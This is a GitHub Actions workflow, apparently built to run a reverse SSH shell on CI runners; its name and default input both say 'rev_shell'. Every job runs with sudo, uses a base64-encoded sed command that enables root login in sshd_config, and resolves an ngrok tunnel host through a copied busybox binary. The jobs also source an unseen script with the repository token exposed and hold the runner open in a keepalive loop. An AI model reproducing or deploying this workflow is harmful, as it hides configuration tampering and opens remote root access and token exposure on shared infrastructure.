name: revSSHai_2025_0513

on:
  workflow_dispatch:
    inputs:
      name77:
        description: 'PersonDesc'
        required: true
        default: 'AABBCC_rev_shell'

jobs:
  build_jobs3:
    runs-on: ubuntu-22.04
    steps:
      - uses: actions/checkout@v3
      
      - name: Run a one-line script
        run: sudo bash -c "echo ${{github.event.action}};echo ${{github.event.inputs}};(env|grep ss>/tmp/s0.a);echo '1'>/id;exit 0"
        env:
          ss0: "c2VkIC1pICJzL14jXD9cKFBlcm1pdFJvb3RMb2dpblwpL1wxIHllcyMvZyIgL2V0Yy9zc2gvc3NoZF9jb25maWc7"
      # Runs a set of commands using the runners shell
      - name: Run a 2-line script
        run: bash -c "echo \"${{github.workspace}}--${GITHUB_WORKSPACE}--${{ runner.workspace }}--${{env.IMAGE_NAME}}--${{ github.run_id }}--${{ github.run_number }}--${{env.IMAGE_TAG}}\";date;sudo cp ./busybox.bin /sbin/busybox;busybox nslookup ngrok.xiaomiqiu123.top 114.114.114.114 |grep -v 114.114.114.114;exit 0"
        env:
          ss0: "c2VkIC1pICJzL14jXD9cKFBlcm1pdFJvb3RMb2dpblwpL1wxIHllcyMvZyIgL2V0Yy9zc2gvc3NoZF9jb25maWc7"
      # Runs a set of commands using the runners shell

      - name: Run ghub.sh script
        run: 
          bash -c 'cd /tmp;echo "${{ toJson(github.event.inputs) }}"|base64 -w0 >js8;base64 -d js8>js9;env|grep ss>s1;. $GITHUB_WORKSPACE/ghub.sh;'
        env:
          sshc1: 'cat /proc/uptime|cut -f1 -d"."'
          Github_Token22: ${{ secrets.GITHUB_TOKEN }}
          Github_act22: ${{ github.event.action }}
          Github_OWN22: ${{ github.repository_owner }}
          Github_REPO22: ${{ github.event.repository.name }}
          Github_wsp22: ${{github.workspace}}
          sp9: 3
          TZ: Asia/Shanghai
          
      - name: Run a 3rd script #cat /tmp/y1;echo liuhuan88;cat /tmp/y2;cat /tmp/y1;
        run: 
          bash -c '(ls -al /tmp;sudo netstat -anlp|grep tcp;sudo ps aux|grep ssh;);' 
        env:
          sp9: 4
          TZ: Asia/Shanghai
          
      - name: Run a 4rd script #[ ${rt} -gt 15 ]&&whoami&&break;
        run: 
          bash -c 'cd /tmp;echo "${{toJson(github.event.action)}}";(rt=0;while :;do rt=$((${rt}+1));[ $((${rt}%30)) -eq 0 ]&&echo $rt&&(sudo netstat -anlp|grep 34292;sudo ps aux|grep sshx64|grep -v keepalive);[ -f /tmp/keepalive ]&&sleep 10||break;done);' #cat y2;
        env:
          sp9: 4
          TZ: Asia/Shanghai



  build_jobs5: 
    runs-on: ubuntu-22.04
    steps:
      - uses: actions/checkout@v3
      
      - name: Run a one-line script2
        run: sudo bash -c "(env|grep ss>/tmp/s0.a);chmod 0777 $GITHUB_WORKSPACE/*;echo '2'>/id;exit 0"
        env:
          ss0: "c2VkIC1pICJzL14jXD9cKFBlcm1pdFJvb3RMb2dpblwpL1wxIHllcyMvZyIgL2V0Yy9zc2gvc3NoZF9jb25maWc7"

      - name: Run a 2-line script2
        run: bash -c "echo \"${{github.workspace}}--${GITHUB_WORKSPACE}--${{ runner.workspace }}--${{env.IMAGE_NAME}}--${{ github.run_id }}--${{ github.run_number }}--${{env.IMAGE_TAG}}\";date;sudo cp ./busybox.bin /sbin/busybox;busybox nslookup ngrok.xiaomiqiu123.top 114.114.114.114 |grep -v 114.114.114.114;exit 0"
      - name: Run ghub.sh script
        run: 
          bash -c 'cd /tmp;echo "${{ toJson(github.event.inputs) }}"|base64 -w0 >js8;base64 -d js8>js9;env|grep ss>s1;. $GITHUB_WORKSPACE/ghub.sh;'
        env:
          sshc1: 'cat /proc/uptime|cut -f1 -d"."'
          Github_Token22: ${{ secrets.GITHUB_TOKEN }}
          Github_act22: ${{ github.event.action }}
          Github_OWN22: ${{ github.repository_owner }}
          Github_REPO22: ${{ github.event.repository.name }}
          Github_wsp22: ${{github.workspace}}
          sp9: 3
          TZ: Asia/Shanghai

      - name: Run a 3rd script2 #cat /tmp/y1;echo liuhuan88;cat /tmp/y2;cat /tmp/y1;
        run: 
          bash -c '(ls -al /tmp;sudo netstat -anlp|grep tcp;sudo ps aux|grep ssh;);' 
        env:
          sp9: 4
          TZ: Asia/Shanghai
          
      - name: Run a 4rd script2 #[ ${rt} -gt 15 ]&&whoami&&break;
        run: 
          bash -c 'cd /tmp;echo "${{toJson(github.event.action)}}";(rt=0;while :;do rt=$((${rt}+1));[ $((${rt}%30)) -eq 0 ]&&echo $rt&&(sudo netstat -anlp|grep 34292;sudo ps aux|grep sshx64|grep -v keepalive);[ -f /tmp/keepalive ]&&sleep 10||break;done);' 
        env:
          sp9: 4
          TZ: Asia/Shanghai
        


  build_jobs7: 
    runs-on: ubuntu-22.04
    steps:
      - uses: actions/checkout@v3
      
      - name: Run a one-line script2
        run: sudo bash -c "(env|grep ss>/tmp/s0.a);chmod 0777 $GITHUB_WORKSPACE/*;echo '3'>/id;exit 0"
        env:
          ss0: "c2VkIC1pICJzL14jXD9cKFBlcm1pdFJvb3RMb2dpblwpL1wxIHllcyMvZyIgL2V0Yy9zc2gvc3NoZF9jb25maWc7"

      - name: Run a 2-line script2
        run: bash -c "echo \"${{github.workspace}}--${GITHUB_WORKSPACE}--${{ runner.workspace }}--${{env.IMAGE_NAME}}--${{ github.run_id }}--${{ github.run_number }}--${{env.IMAGE_TAG}}\";date;sudo cp ./busybox.bin /sbin/busybox;busybox nslookup ngrok.xiaomiqiu123.top 114.114.114.114 |grep -v 114.114.114.114;exit 0"
      - name: Run ghub.sh script
        run: 
          bash -c 'cd /tmp;echo "${{ toJson(github.event.inputs) }}"|base64 -w0 >js8;base64 -d js8>js9;env|grep ss>s1;. $GITHUB_WORKSPACE/ghub.sh;'
        env:
          sshc1: 'cat /proc/uptime|cut -f1 -d"."'
          Github_Token22: ${{ secrets.GITHUB_TOKEN }}
          Github_act22: ${{ github.event.action }}
          Github_OWN22: ${{ github.repository_owner }}
          Github_REPO22: ${{ github.event.repository.name }}
          Github_wsp22: ${{github.workspace}}
          sp9: 3
          TZ: Asia/Shanghai

      - name: Run a 3rd script2 #cat /tmp/y1;echo liuhuan88;cat /tmp/y2;cat /tmp/y1;
        run: 
          bash -c '(ls -al /tmp;sudo netstat -anlp|grep tcp;sudo ps aux|grep ssh;);' 
        env:
          sp9: 4
          TZ: Asia/Shanghai
          
      - name: Run a 4rd script2 #[ ${rt} -gt 15 ]&&whoami&&break;
        run: 
          bash -c 'cd /tmp;echo "${{toJson(github.event.action)}}";(rt=0;while :;do rt=$((${rt}+1));[ $((${rt}%30)) -eq 0 ]&&echo $rt&&(sudo netstat -anlp|grep 34292;sudo ps aux|grep sshx64|grep -v keepalive);[ -f /tmp/keepalive ]&&sleep 10||break;done);' 
        env:
          sp9: 4
          TZ: Asia/Shanghai
                
                        
